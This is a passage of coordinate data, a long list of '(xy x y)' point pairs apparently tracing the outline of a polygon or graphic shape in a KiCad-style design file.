(xy 10.871903 23.296471) (xy 10.922 23.345839) (xy 11.361561 23.778931) (xy 11.722127 24.13274)
(xy 12.014884 24.417404) (xy 12.251018 24.643063) (xy 12.441716 24.819855) (xy 12.598165 24.957918)
(xy 12.73155 25.067391) (xy 12.853058 25.158412) (xy 12.973876 25.241121) (xy 13.105189 25.325656)
(xy 13.109307 25.328262) (xy 13.417463 25.479674) (xy 13.709616 25.520015) (xy 14.022101 25.451643)
(xy 14.156851 25.396237) (xy 14.59911 25.129969) (xy 15.025042 24.742039) (xy 15.431752 24.237073)
(xy 15.816344 23.619699) (xy 16.175924 22.89454) (xy 16.507596 22.066225) (xy 16.797363 21.17725)
(xy 17.034957 20.372914) (xy 17.241009 19.682305) (xy 17.418469 19.096927) (xy 17.57029 18.608284)
(xy 17.699424 18.207877) (xy 17.808822 17.887209) (xy 17.901436 17.637783) (xy 17.980219 17.451102)
(xy 18.048121 17.318668) (xy 18.108096 17.231985) (xy 18.163094 17.182554) (xy 18.189737 17.16912)
(xy 18.344385 17.154344) (xy 18.527799 17.222763) (xy 18.745964 17.379721) (xy 19.004867 17.630565)
(xy 19.310493 17.98064) (xy 19.668829 18.435291) (xy 19.794211 18.601868) (xy 20.058222 18.944718)
(xy 20.280829 19.195066) (xy 20.489221 19.367294) (xy 20.710587 19.475782) (xy 20.972115 19.534914)
(xy 21.300993 19.559069) (xy 21.611023 19.562885) (xy 22.037036 19.552565) (xy 22.365891 19.514983)
(xy 22.626245 19.440204) (xy 22.846752 19.318292) (xy 23.056069 19.139314) (xy 23.167314 19.02333)
(xy 23.494339 18.573706) (xy 23.717918 18.050722) (xy 23.810754 17.653) (xy 23.83256 17.472696)
(xy 23.856922 17.188864) (xy 23.882296 16.82491) (xy 23.907137 16.404239) (xy 23.929903 15.950258)
(xy 23.942682 15.65275) (xy 23.976443 14.883386) (xy 24.011272 14.238494) (xy 24.047391 13.715553)
(xy 24.085021 13.312038) (xy 24.124385 13.025426) (xy 24.165705 12.853194) (xy 24.193669 12.801431)
(xy 24.270437 12.784359) (xy 24.417211 12.83019) (xy 24.649157 12.94404) (xy 24.702867 12.973104)
(xy 25.192025 13.215016) (xy 25.624255 13.370248) (xy 26.026835 13.447191) (xy 26.283065 13.459213)
(xy 26.791483 13.399985) (xy 27.237862 13.230352) (xy 27.620557 12.951632) (xy 27.937922 12.565143)
(xy 28.188311 12.072201) (xy 28.25885 11.877701) (xy 28.341277 11.582221) (xy 28.397189 11.262888)
(xy 28.426948 10.901911) (xy 28.430913 10.481499) (xy 28.409444 9.983858) (xy 28.362901 9.391198)
(xy 28.318342 8.936657) (xy 28.170508 7.513207) (xy 28.296869 7.296846) (xy 28.40431 7.155915)
(xy 28.579604 6.970298) (xy 28.790469 6.77342) (xy 28.860737 6.713037) (xy 29.135012 6.495039)
(xy 29.476419 6.242486) (xy 29.85949 5.972439) (xy 30.258755 5.701959) (xy 30.648745 5.448109)
(xy 31.003991 5.227949) (xy 31.299023 5.05854) (xy 31.4325 4.990268) (xy 31.604972 4.911138)
(xy 31.750585 4.856783) (xy 31.899527 4.82256) (xy 32.081988 4.803826) (xy 32.328156 4.79594)
(xy 32.668221 4.794256) (xy 32.70707 4.79425) (xy 32.986684 4.794955) (xy 33.211983 4.790926)
(xy 33.399333 4.772945) (xy 33.565101 4.731798) (xy 33.725653 4.658266) (xy 33.897357 4.543134)
(xy 34.096578 4.377184) (xy 34.339683 4.151202) (xy 34.643039 3.85597) (xy 35.004375 3.500572)
(xy 35.941 2.580701) (xy 35.941 0.6973) (xy 35.967677 -0.814319) (xy 36.050581 -2.243295)
(xy 36.194018 -3.622886) (xy 36.402293 -4.986351) (xy 36.679715 -6.366948) (xy 37.030588 -7.797938)
(xy 37.050829 -7.874) (xy 37.181306 -8.364543) (xy 37.278406 -8.750217) (xy 37.340544 -9.04911)
(xy 37.366134 -9.27931) (xy 37.353589 -9.458904) (xy 37.301324 -9.605981) (xy 37.207752 -9.738628)
(xy 37.071287 -9.874933) (xy 36.890342 -10.032984) (xy 36.859153 -10.059782) (xy 36.706441 -10.192934)
(xy 36.581024 -10.313794) (xy 36.479921 -10.436201) (xy 36.400151 -10.573991) (xy 36.338732 -10.741002)
(xy 36.292682 -10.951073) (xy 36.25902 -11.218042) (xy 36.234764 -11.555745) (xy 36.216933 -11.978022)
(xy 36.202546 -12.498709) (xy 36.188621 -13.131645) (xy 36.187676 -13.17625) (xy 36.174415 -13.713773)
(xy 36.158209 -14.226688) (xy 36.13989 -14.697166) (xy 36.120284 -15.107378) (xy 36.100223 -15.439496)
(xy 36.080534 -15.675692) (xy 36.066648 -15.778468) (xy 35.958712 -16.185561) (xy 35.810893 -16.481162)
(xy 35.614382 -16.676917) (xy 35.360367 -16.784474) (xy 35.29585 -16.797464) (xy 35.157706 -16.810728)
(xy 35.017204 -16.79812) (xy 34.862493 -16.752465) (xy 34.681723 -16.666588) (xy 34.463043 -16.533313)
(xy 34.194603 -16.345465) (xy 33.864553 -16.095868) (xy 33.461042 -15.777346) (xy 33.009815 -15.413263)
(xy 32.5568 -15.082154) (xy 32.15283 -14.86556) (xy 31.794301 -14.762423) (xy 31.477604 -14.771687)
(xy 31.209353 -14.885498) (xy 31.103159 -14.993391) (xy 30.978645 -15.174182) (xy 30.888381 -15.338494)
(xy 30.792825 -15.562238) (xy 30.733565 -15.782958) (xy 30.713575 -16.016007) (xy 30.735828 -16.276738)
(xy 30.8033 -16.580507) (xy 30.918964 -16.942666) (xy 31.085794 -17.378571) (xy 31.306764 -17.903574)
(xy 31.447422 -18.2245) (xy 31.720342 -18.864468) (xy 31.933351 -19.426618) (xy 32.092587 -19.941606)
(xy 32.204188 -20.440088) (xy 32.27429 -20.952722) (xy 32.309032 -21.510161) (xy 32.31455 -22.143064)
(xy 32.307678 -22.521444) (xy 32.292475 -22.996347) (xy 32.26781 -23.372858) (xy 32.225227 -23.679579)
(xy 32.156272 -23.945115) (xy 32.052492 -24.198069) (xy 31.905431 -24.467044) (xy 31.706636 -24.780643)
(xy 31.58661 -24.961006) (xy 31.016179 -25.749446) (xy 30.410733 -26.470116) (xy 29.78426 -27.108799)
(xy 29.150746 -27.651277) (xy 28.52418 -28.083336) (xy 28.500838 -28.097301) (xy 28.089787 -28.32531)
(xy 27.635853 -28.548783) (xy 27.157269 -28.761309) (xy 26.672267 -28.956481) (xy 26.19908 -29.127887)
(xy 25.755939 -29.26912) (xy 25.361078 -29.37377) (xy 25.032729 -29.435428) (xy 24.789124 -29.447684)
(xy 24.702445 -29.43255) (xy 24.61253 -29.368864) (xy 24.537591 -29.230593) (xy 24.472582 -29.002567)
(xy 24.412456 -28.669619) (xy 24.385409 -28.47975) (xy 24.365878 -28.309725) (xy 24.339607 -28.046323)
(xy 24.308625 -27.713589) (xy 24.274959 -27.335574) (xy 24.240639 -26.936325) (xy 24.207691 -26.539892)
(xy 24.178145 -26.170321) (xy 24.154029 -25.851663) (xy 24.13737 -25.607965) (xy 24.130198 -25.463276)
(xy 24.130066 -25.452213) (xy 24.068569 -25.433052) (xy 23.888285 -25.435915) (xy 23.595389 -25.460148)
(xy 23.196052 -25.505093) (xy 22.696448 -25.570095) (xy 22.102748 -25.654498) (xy 21.795542 -25.700293)
(xy 21.551825 -25.681305) (xy 21.258436 -25.567769) (xy 20.936041 -25.370882) (xy 20.605305 -25.101838)
(xy 20.493662 -24.994954) (xy 20.094085 -24.540999) (xy 19.809861 -24.083284) (xy 19.63774 -23.607025)
(xy 19.574472 -23.097437) (xy 19.616809 -22.539734) (xy 19.761501 -21.919133) (xy 19.794172 -21.81225)
(xy 20.101549 -21.027878) (xy 20.527338 -20.243806) (xy 21.063562 -19.472754) (xy 21.702243 -18.727443)
(xy 21.779963 -18.645966) (xy 22.44277 -18.012366) (xy 23.119951 -17.477892) (xy 23.845863 -17.016255)
(xy 24.074627 -16.889986) (xy 24.57658 -16.596962) (xy 24.968386 -16.310048) (xy 25.265326 -16.015445)
(xy 25.482683 -15.69935) (xy 25.556094 -15.552027) (xy 25.609523 -15.404997) (xy 25.678475 -15.174684)
(xy 25.757506 -14.884113) (xy 25.84117 -14.556311) (xy 25.924021 -14.214303) (xy 26.000612 -13.881116)
(xy 26.065499 -13.579774) (xy 26.113236 -13.333303) (xy 26.138377 -13.16473) (xy 26.136522 -13.097855)
(xy 26.086479 -13.132635) (xy 25.958455 -13.239516) (xy 25.768175 -13.40488) (xy 25.531364 -13.615106)
(xy 25.331128 -13.795428) (xy 24.718638 -14.343062) (xy 24.172065 -14.81571) (xy 23.67035 -15.230927)
(xy 23.192432 -15.606266) (xy 22.86 -15.855244) (xy 21.587753 -16.743249) (xy 20.266723 -17.57183)
(xy 18.884336 -18.347251) (xy 17.428017 -19.075772) (xy 15.885192 -19.763658) (xy 14.243287 -20.41717)
(xy 12.489729 -21.042571) (xy 12.35075 -21.089394) (xy 11.845142 -21.25766) (xy 11.452422 -21.388838)
(xy 11.166529 -21.490351) (xy 10.981406 -21.569621) (xy 10.890995 -21.634073) (xy 10.889238 -21.691128)
(xy 10.970077 -21.748211) (xy 11.127454 -21.812743) (xy 11.355311 -21.89215) (xy 11.6205 -21.984195)
(xy 12.49253 -22.352136) (xy 13.348455 -22.83205) (xy 14.198673 -23.430063) (xy 14.5415 -23.705378)
(xy 14.734092 -23.872143) (xy 14.979503 -24.094814) (xy 15.264654 -24.360549) (xy 15.57647 -24.656505)
(xy 15.901876 -24.969836) (xy 16.227794 -25.287702) (xy 16.54115 -25.597257) (xy 16.828868 -25.885658)
(xy 17.07787 -26.140062) (xy 17.275082 -26.347626) (xy 17.407427 -26.495506) (xy 17.46183 -26.570859)
(xy 17.4625 -26.574433) (xy 17.420375 -26.644937) (xy 17.305717 -26.784639) (xy 17.136095 -26.973237)
(xy 16.931595 -27.187858) (xy 16.284986 -27.767809) (xy 15.520799 -28.306154) (xy 14.642034 -28.801156)
(xy 13.651693 -29.251081) (xy 12.827 -29.561551) (xy 12.364843 -29.725831) (xy 12.011046 -29.861439)
(xy 11.751833 -29.974526) (xy 11.573431 -30.071245) (xy 11.462067 -30.157745) (xy 11.441655 -30.180205)
(xy 11.420041 -30.29324) (xy 11.482249 -30.482792) (xy 11.630016 -30.752073) (xy 11.865076 -31.104296)
(xy 12.149921 -31.49121) (xy 12.55013 -32.01882) (xy 12.881045 -32.45784) (xy 13.151062 -32.820145)
(xy 13.368579 -33.117609) (xy 13.54199 -33.362106) (xy 13.679694 -33.565512) (xy 13.790086 -33.739702)
(xy 13.881564 -33.896549) (xy 13.962523 -34.047928) (xy 13.974963 -34.072242) (xy 14.10116 -34.342688)
(xy 14.184722 -34.568614) (xy 14.215144 -34.720727) (xy 14.214033 -34.738992) (xy 14.132717 -34.884987)
(xy 13.939847 -35.031728) (xy 13.650804 -35.175961) (xy 13.280969 -35.314432) (xy 12.845726 -35.443887)
(xy 12.360455 -35.56107) (xy 11.840539 -35.662728) (xy 11.301359 -35.745606) (xy 10.758298 -35.80645)
(xy 10.226738 -35.842006) (xy 9.72206 -35.849019) (xy 9.259646 -35.824234) (xy 9.144 -35.811664)
(xy 8.240715 -35.654437) (xy 7.356117 -35.410159) (xy 6.5111 -35.087746) (xy 5.726562 -34.696114)
(xy 5.023396 -34.24418) (xy 4.531706 -33.843575) (xy 4.267241 -33.58873) (xy 4.018431 -33.317889)
(xy 3.775267 -33.016398) (xy 3.527743 -32.669605) (xy 3.265852 -32.262859) (xy 2.979586 -31.781506)
(xy 2.658938 -31.210896) (xy 2.369822 -30.678212) (xy 1.967224 -29.944904) (xy 1.601255 -29.317431)
(xy 1.262374 -28.783317) (xy 0.941035 -28.330088) (xy 0.627695 -27.945269) (xy 0.31281 -27.616386)
(xy -0.013164 -27.330965) (xy -0.35977 -27.07653) (xy -0.41275 -27.041177) (xy -0.610381 -26.918574)
(xy -0.894585 -26.752711) (xy -1.239013 -26.558443) (xy -1.617315 -26.350622) (xy -2.00314 -26.144104)
(xy -2.017836 -26.136355) (xy -2.426003 -25.917962) (xy -2.848875 -25.685955) (xy -3.253805 -25.458644)
(xy -3.608141 -25.254337) (xy -3.859336 -25.103697) (xy -4.164653 -24.915058) (xy -4.472828 -24.724929)
(xy -4.745122 -24.557194) (xy -4.92125 -24.448948) (xy -5.185861 -24.296106) (xy -5.465085 -24.155889)
(xy -5.771567 -24.024543) (xy -6.117957 -23.898313) (xy -6.516901 -23.773443) (xy -6.981046 -23.646179)
(xy -7.52304 -23.512766) (xy -8.15553 -23.36945) (xy -8.891163 -23.212475) (xy -9.525 -23.082136)
(xy -10.573159 -22.863744) (xy -11.503947 -22.658304) (xy -12.315569 -22.466256) (xy -13.006225 -22.288041)
(xy -13.57412 -22.124098) (xy -13.9617 -21.995311) (xy -14.235753 -21.902528) (xy -14.482787 -21.829897)
(xy -14.66709 -21.787406) (xy -14.729683 -21.7805) (xy -14.774709 -21.778887) (xy -14.81244 -21.781291)
(xy -14.845002 -21.798575) (xy -14.87452 -21.8416) (xy -14.903121 -21.921229) (xy -14.932929 -22.048325)
(xy -14.96607 -22.23375) (xy -15.004671 -22.488366) (xy -15.050856 -22.823036) (xy -15.106751 -23.248622)
(xy -15.174481 -23.775987) (xy -15.256173 -24.415993) (xy -15.276423 -24.5745) (xy -15.405759 -25.520139)
(xy -15.537925 -26.347981) (xy -15.675528 -27.067226) (xy -15.821176 -27.687078) (xy -15.977478 -28.216738)
(xy -16.147042 -28.665407) (xy -16.332476 -29.042288) (xy -16.536388 -29.356582) (xy -16.682078 -29.53389)
(xy -16.959676 -29.786824) (xy -17.247902 -29.934336) (xy -17.557836 -29.975911) (xy -17.900557 -29.911034)
(xy -18.287144 -29.73919) (xy -18.728676 -29.459864) (xy -18.760564 -29.437246) (xy -19.072936 -29.197021)
(xy -19.382438 -28.921825) (xy -19.693338 -28.605046) (xy -20.0099 -28.240073) (xy -20.336392 -27.820294)
(xy -20.677078 -27.339099) (xy -21.036224 -26.789876) (xy -21.418097 -26.166015) (xy -21.826962 -25.460904)
(xy -22.267085 -24.667932) (xy -22.742732 -23.780488) (xy -23.258169 -22.79196) (xy -23.817662 -21.695739)
(xy -24.039156 -21.256625) (xy -24.319258 -20.700655) (xy -24.582121 -20.180659) (xy -24.822253 -19.707381)
(xy -25.03416 -19.291561) (xy -25.212349 -18.943945) (xy -25.351328 -18.675273) (xy -25.445603 -18.496289)
(xy -25.489682 -18.417736) (xy -25.4921 -18.415) (xy -25.573011 -18.440633) (xy -25.742657 -18.509807)
(xy -25.975364 -18.610934) (xy -26.245455 -18.732423) (xy -26.527257 -18.862688) (xy -26.795094 -18.990138)
(xy -27.02329 -19.103184) (xy -27.069444 -19.126956) (xy -27.464391 -19.347686) (xy -27.944331 -19.641852)
(xy -28.497049 -20.001163) (xy -29.11033 -20.417325) (xy -29.77196 -20.882045) (xy -30.469723 -21.387032)
(xy -31.191406 -21.923992) (xy -31.21025 -21.938207) (xy -31.844431 -22.413576) (xy -32.394472 -22.818337)
(xy -32.874612 -23.162199) (xy -33.299087 -23.454872) (xy -33.682135 -23.706067) (xy -34.037993 -23.925492)
(xy -34.380901 -24.122858) (xy -34.545773 -24.212985) (xy -35.264867 -24.563407) (xy -35.949136 -24.824371)
(xy -36.589728 -24.994204) (xy -37.177791 -25.07123) (xy -37.704473 -25.053776) (xy -38.160921 -24.940166)
(xy -38.232677 -24.910381) (xy -38.571243 -24.707228) (xy -38.870768 -24.412356) (xy -39.133906 -24.020145)
(xy -39.363312 -23.524974) (xy -39.561641 -22.921225) (xy -39.731547 -22.203277) (xy -39.861117 -21.463)
(xy -39.901131 -21.111879) (xy -39.932569 -20.656144) (xy -39.946731 -20.322962) (xy -38.092646 -20.322962)
(xy -38.087148 -20.84685) (xy -38.071958 -21.279984) (xy -38.045658 -21.634407) (xy -38.006828 -21.922161)
(xy -37.954049 -22.15529) (xy -37.885904 -22.345837) (xy -37.800972 -22.505845) (xy -37.697836 -22.647357)
(xy -37.637004 -22.717125) (xy -37.515706 -22.822407) (xy -37.39945 -22.84551) (xy -37.263937 -22.780132)
(xy -37.084865 -22.619974) (xy -37.024656 -22.558375) (xy -36.899017 -22.421462) (xy -36.708292 -22.205627)
(xy -36.468648 -21.929552) (xy -36.196254 -21.611919) (xy -35.907276 -21.271412) (xy -35.774497 -21.11375)
(xy -35.395374 -20.666547) (xy -34.94445 -20.141635) (xy -34.435706 -19.554959) (xy -33.88312 -18.922462)
(xy -33.300673 -18.260087) (xy -32.702345 -17.583777) (xy -32.102115 -16.909478) (xy -31.513964 -16.253131)
(xy -31.459413 -16.1925) (xy -31.004863 -15.681984) (xy -30.632687 -15.25128) (xy -30.335161 -14.890692)
(xy -30.104564 -14.590523) (xy -29.933172 -14.341077) (xy -29.813265 -14.132657) (xy -29.803813 -14.113707)
(xy -29.719185 -13.934155) (xy -29.677943 -13.801544) (xy -29.675944 -13.667395) (xy -29.709051 -13.483229)
(xy -29.738741 -13.351707) (xy -29.784856 -13.14366) (xy -29.822561 -12.951543) (xy -29.853216 -12.758144)
(xy -29.87818 -12.546251) (xy -29.898812 -12.29865) (xy -29.916471 -11.998127) (xy -29.932518 -11.627471)
(xy -29.94831 -11.169468) (xy -29.965209 -10.606905) (xy -29.97073 -10.414) (xy -29.987192 -9.911849)
(xy -30.006939 -9.43465) (xy -30.02886 -9.001695) (xy -30.051841 -8.632277) (xy -30.074751 -8.345949)
(xy -26.214811 -8.345949) (xy -26.209484 -8.747894) (xy -26.183917 -9.151948) (xy -26.135466 -9.566723)
(xy -26.061485 -10.000834) (xy -25.959329 -10.462893) (xy -25.826353 -10.961513) (xy -25.659912 -11.505308)
(xy -25.45736 -12.102891) (xy -25.216052 -12.762876) (xy -24.933343 -13.493875) (xy -24.606587 -14.304502)
(xy -24.23314 -15.20337) (xy -23.810356 -16.199092) (xy -23.33559 -17.300282) (xy -23.306542 -17.36725)
(xy -22.929004 -18.239391) (xy -22.595968 -19.013557) (xy -22.299989 -19.707661) (xy -22.033624 -20.33962)
(xy -21.789429 -20.927348) (xy -21.559961 -21.48876) (xy -21.337776 -22.041771) (xy -21.115431 -22.604298)
(xy -20.885643 -23.193835) (xy -20.713703 -23.632843) (xy -20.540966 -24.065417) (xy -20.377651 -24.46658)
(xy -20.23398 -24.811359) (xy -20.120173 -25.074777) (xy -20.078015 -25.16742) (xy -19.863626 -25.593017)
(xy -19.633094 -25.995206) (xy -19.397828 -26.358544) (xy -19.169238 -26.667586) (xy -18.958734 -26.906886)
(xy -18.777726 -27.061) (xy -18.63961 -27.1145) (xy -18.571831 -27.052314) (xy -18.521617 -26.865266)
(xy -18.509447 -26.780807) (xy -18.495882 -26.543474) (xy -18.498627 -26.192218) (xy -18.516719 -25.738937)
(xy -18.549196 -25.195529) (xy -18.595096 -24.57389) (xy -18.653456 -23.885918) (xy -18.723314 -23.14351)
(xy -18.803707 -22.358564) (xy -18.893673 -21.542977) (xy -18.992251 -20.708647) (xy -19.016642 -20.5105)
(xy -19.105453 -19.775807) (xy -19.176415 -19.13871) (xy -19.231378 -18.571339) (xy -19.272196 -18.045826)
(xy -19.300721 -17.534305) (xy -19.318804 -17.008907) (xy -19.328298 -16.441763) (xy -19.331055 -15.805007)
(xy -19.331052 -15.77975) (xy -19.328916 -15.180652) (xy -19.322191 -14.687206) (xy -19.309902 -14.278116)
(xy -19.291072 -13.932085) (xy -19.264724 -13.627817) (xy -19.229883 -13.344015) (xy -19.214616 -13.23975)
(xy -19.074555 -12.470974) (xy -18.905829 -11.822592) (xy -18.70652 -11.290845) (xy -18.474712 -10.871975)
(xy -18.208486 -10.562225) (xy -17.905926 -10.357836) (xy -17.706567 -10.284325) (xy -17.531602 -10.244682)
(xy -17.428718 -10.253347) (xy -17.349587 -10.318242) (xy -17.325765 -10.346753) (xy -17.246604 -10.481717)
(xy -17.137847 -10.720869) (xy -17.005599 -11.046518) (xy -16.855963 -11.440973) (xy -16.695043 -11.886541)
(xy -16.528943 -12.365532) (xy -16.363766 -12.860255) (xy -16.205616 -13.353018) (xy -16.060597 -13.82613)
(xy -15.934814 -14.2619) (xy -15.834369 -14.642636) (xy -15.812786 -14.732) (xy -15.743648 -15.023919)
(xy -15.678434 -15.296975) (xy -15.627314 -15.508675) (xy -15.611165 -15.574427) (xy -15.537788 -15.769559)
(xy -15.408048 -15.963897) (xy -15.208555 -16.170772) (xy -14.92592 -16.403517) (xy -14.546756 -16.675461)
(xy -14.417074 -16.763397) (xy -14.061758 -17.00407) (xy -13.661422 -17.278534) (xy -13.26925 -17.550172)
(xy -12.98575 -17.748876) (xy -12.478808 -18.085828) (xy -11.988589 -18.371333) (xy -11.533576 -18.596287)
(xy -11.132249 -18.751588) (xy -10.803089 -18.828133) (xy -10.792025 -18.829392) (xy -10.562571 -18.837782)
(xy -10.369739 -18.798088) (xy -10.191975 -18.695913) (xy -10.007729 -18.516862) (xy -9.795449 -18.246541)
(xy -9.683338 -18.088853) (xy -9.374034 -17.655775) (xy -9.123029 -17.327865) (xy -8.925964 -17.099825)
(xy -8.778477 -16.966355) (xy -8.73961 -16.941981) (xy -8.648571 -16.91318) (xy -8.560542 -16.949697)
(xy -8.440771 -17.06873) (xy -8.408198 -17.105977) (xy -8.304846 -17.248663) (xy -8.162456 -17.47676)
(xy -7.997963 -17.761682) (xy -7.828303 -18.074839) (xy -7.78584 -18.15657) (xy -7.446815 -18.786729)
(xy -7.102479 -19.36346) (xy -6.736903 -19.907685) (xy -6.334161 -20.440327) (xy -5.878323 -20.982308)
(xy -5.353462 -21.554551) (xy -4.74365 -22.177979) (xy -4.664485 -22.25675) (xy -4.122067 -22.784086)
(xy -3.617544 -23.248037) (xy -3.130203 -23.663601) (xy -2.63933 -24.045775) (xy -2.124213 -24.409558)
(xy -1.564139 -24.769948) (xy -0.938395 -25.141942) (xy -0.226268 -25.540538) (xy 0.15875 -25.749173)
(xy 0.647063 -26.01181) (xy 1.040107 -26.224187) (xy 1.354592 -26.395951) (xy 1.607232 -26.536748)
(xy 1.814739 -26.656226) (xy 1.993825 -26.764031) (xy 2.161204 -26.86981) (xy 2.333586 -26.983211)
(xy 2.527685 -27.113879) (xy 2.55474 -27.132201) (xy 3.042846 -27.498838) (xy 3.442639 -27.874536)
(xy 3.742295 -28.246666) (xy 3.929087 -28.600179) (xy 4.023492 -28.925025) (xy 4.10204 -29.33583)
(xy 4.158905 -29.791947) (xy 4.188263 -30.25273) (xy 4.191 -30.427583) (xy 4.232476 -31.031144)
(xy 4.361465 -31.551349) (xy 4.584807 -32.002931) (xy 4.909341 -32.40062) (xy 5.23875 -32.684104)
(xy 5.76158 -33.026732) (xy 6.368784 -33.339793) (xy 7.018242 -33.605069) (xy 7.667836 -33.80434)
(xy 7.9952 -33.876482) (xy 8.246345 -33.910075) (xy 8.576896 -33.93494) (xy 8.96397 -33.951291)
(xy 9.384681 -33.959344) (xy 9.816146 -33.959316) (xy 10.235479 -33.951421) (xy 10.619796 -33.935875)
(xy 10.946212 -33.912895) (xy 11.191843 -33.882694) (xy 11.333805 -33.84549) (xy 11.33475 -33.84502)
(xy 11.486179 -33.736682) (xy 11.544974 -33.600306) (xy 11.509546 -33.421595) (xy 11.378307 -33.186251)
(xy 11.240408 -32.995532) (xy 10.972158 -32.629337) (xy 10.685738 -32.209639) (xy 10.389161 -31.750826)
(xy 10.090439 -31.267286) (xy 9.797585 -30.773405) (xy 9.518612 -30.283572) (xy 9.261531 -29.812173)
(xy 9.034356 -29.373596) (xy 8.8451 -28.982228) (xy 8.701774 -28.652456) (xy 8.612392 -28.398668)
(xy 8.584966 -28.235252) (xy 8.58549 -28.228379) (xy 8.667712 -28.035411) (xy 8.871291 -27.862725)
(xy 9.191726 -27.713605) (xy 9.369717 -27.655973) (xy 9.584284 -27.596805) (xy 9.80258 -27.544624)
(xy 10.045204 -27.495925) (xy 10.332755 -27.447206) (xy 10.685833 -27.39496) (xy 11.125035 -27.335684)
(xy 11.639326 -27.269855) (xy 12.322691 -27.179456) (xy 12.895876 -27.093234) (xy 13.375458 -27.007509)
(xy 13.778013 -26.918604) (xy 14.120119 -26.82284) (xy 14.418352 -26.716539) (xy 14.689289 -26.596022)
(xy 14.70025 -26.590628) (xy 14.996482 -26.418429) (xy 15.170979 -26.246386) (xy 15.228154 -26.059993)
(xy 15.172423 -25.844745) (xy 15.008201 -25.586134) (xy 15.00659 -25.584019) (xy 14.743494 -25.285855)
(xy 14.396129 -24.959674) (xy 13.995897 -24.629887) (xy 13.574203 -24.320907) (xy 13.162449 -24.057148)
(xy 12.793829 -23.863821) (xy 12.293418 -23.688291) (xy 11.705907 -23.561069) (xy 11.061348 -23.482617)
(xy 10.38979 -23.453395) (xy 9.721287 -23.473864) (xy 9.085887 -23.544484) (xy 8.513643 -23.665716)
(xy 8.138289 -23.79247) (xy 7.702795 -24.036701) (xy 7.278403 -24.404676) (xy 6.867846 -24.893417)
(xy 6.473854 -25.499943) (xy 6.322692 -25.772635) (xy 6.169151 -26.047175) (xy 6.011114 -26.305637)
(xy 5.872684 -26.509554) (xy 5.814855 -26.583118) (xy 5.614108 -26.815347) (xy 5.387261 -26.707702)
(xy 5.162913 -26.576434) (xy 4.862377 -26.362333) (xy 4.496575 -26.074985) (xy 4.076426 -25.723974)
(xy 3.612852 -25.318887) (xy 3.116773 -24.869308) (xy 2.694329 -24.473939) (xy 4.953 -24.473939)
(xy 5.007521 -24.603465) (xy 5.151658 -24.680603) (xy 5.356273 -24.697976) (xy 5.592224 -24.648208)
(xy 5.612295 -24.640834) (xy 5.807751 -24.500611) (xy 5.944268 -24.258994) (xy 5.991908 -24.079958)
(xy 5.993085 -23.90681) (xy 5.913054 -23.828235) (xy 5.74839 -23.842341) (xy 5.63495 -23.882855)
(xy 5.470398 -23.973034) (xy 5.288229 -24.104983) (xy 5.120151 -24.251221) (xy 4.997871 -24.384264)
(xy 4.953 -24.473939) (xy 2.694329 -24.473939) (xy 2.59911 -24.384823) (xy 2.070785 -23.875017)
(xy 1.542717 -23.349475) (xy 1.424659 -23.229638) (xy 0.65369 -22.4216) (xy -0.040613 -21.647661)
(xy -0.654935 -20.912656) (xy -1.185961 -20.221419) (xy -1.630375 -19.578781) (xy -1.984859 -18.989577)
(xy -2.2461 -18.458641) (xy -2.41078 -17.990805) (xy -2.475584 -17.590904) (xy -2.4765 -17.543071)
(xy -2.449531 -17.342512) (xy -2.381059 -17.151473) (xy -2.289744 -17.009095) (xy -2.19596 -16.9545)
(xy -2.102814 -17.002404) (xy -1.955811 -17.131208) (xy -1.775028 -17.31855) (xy -1.580538 -17.542067)
(xy -1.392417 -17.779395) (xy -1.230739 -18.008173) (xy -1.184908 -18.080778) (xy -1.051595 -18.326385)
(xy -0.937181 -18.582524) (xy -0.878695 -18.752628) (xy -0.819332 -18.938116) (xy -0.744993 -19.04018)
(xy -0.617893 -19.100333) (xy -0.542139 -19.122417) (xy -0.360861 -19.148363) (xy -0.067574 -19.160586)
(xy 0.32352 -19.159457) (xy 0.798214 -19.14535) (xy 1.342305 -19.118636) (xy 1.941588 -19.079688)
(xy 2.38125 -19.04576) (xy 4.336997 -18.826811) (xy 6.321587 -18.490033) (xy 8.325726 -18.038737)
(xy 10.340123 -17.476234) (xy 12.355487 -16.805834) (xy 14.362525 -16.030848) (xy 16.351947 -15.154588)
(xy 18.314459 -14.180364) (xy 20.240772 -13.111487) (xy 21.912285 -12.086427) (xy 22.639664 -11.612455)
(xy 23.261307 -11.191722) (xy 23.784108 -10.818786) (xy 24.214959 -10.488203) (xy 24.560755 -10.19453)
(xy 24.828389 -9.932322) (xy 25.024754 -9.696138) (xy 25.115846 -9.55675) (xy 25.192252 -9.395137)
(xy 25.289801 -9.145894) (xy 25.395643 -8.843753) (xy 25.491751 -8.54075) (xy 25.754206 -7.767238)
(xy 26.04595 -7.10548) (xy 26.374401 -6.542128) (xy 26.746976 -6.063833) (xy 27.021757 -5.787256)
(xy 27.281645 -5.56132) (xy 27.497463 -5.407228) (xy 27.708866 -5.301331) (xy 27.955507 -5.219979)
(xy 27.987625 -5.211208) (xy 28.259965 -5.17917) (xy 28.533288 -5.215792) (xy 28.778851 -5.308507)
(xy 28.967911 -5.444748) (xy 29.071726 -5.611948) (xy 29.083 -5.690143) (xy 29.066638 -5.774726)
(xy 29.003169 -5.852563) (xy 28.871016 -5.940747) (xy 28.648604 -6.056372) (xy 28.57618 -6.091661)
(xy 28.321228 -6.212029) (xy 28.087017 -6.317512) (xy 27.913664 -6.390196) (xy 27.87768 -6.403573)
(xy 27.818427 -6.421836) (xy 27.771376 -6.439764) (xy 27.736356 -6.47047) (xy 27.713197 -6.527065)
(xy 27.701731 -6.622664) (xy 27.701786 -6.770377) (xy 27.713194 -6.983319) (xy 27.735784 -7.274601)
(xy 27.769388 -7.657337) (xy 27.813834 -8.144639) (xy 27.850012 -8.54075) (xy 27.910699 -9.274978)
(xy 27.961767 -10.029043) (xy 28.002724 -10.784747) (xy 28.033075 -11.523897) (xy 28.052328 -12.228297)
(xy 28.059989 -12.879752) (xy 28.055565 -13.460066) (xy 28.038562 -13.951046) (xy 28.008487 -14.334495)
(xy 28.007377 -14.344155) (xy 27.883155 -15.091213) (xy 27.693176 -15.792726) (xy 27.446914 -16.414796)
(xy 27.403945 -16.502662) (xy 27.23885 -16.812541) (xy 27.080215 -17.055684) (xy 26.907148 -17.246583)
(xy 26.698753 -17.399733) (xy 26.434135 -17.529629) (xy 26.092401 -17.650765) (xy 25.652657 -17.777637)
(xy 25.511345 -17.815571) (xy 24.894499 -17.996016) (xy 24.380895 -18.18584) (xy 23.946809 -18.397164)
(xy 23.568513 -18.642112) (xy 23.22228 -18.932805) (xy 23.108742 -19.043119) (xy 22.868084 -19.30393)
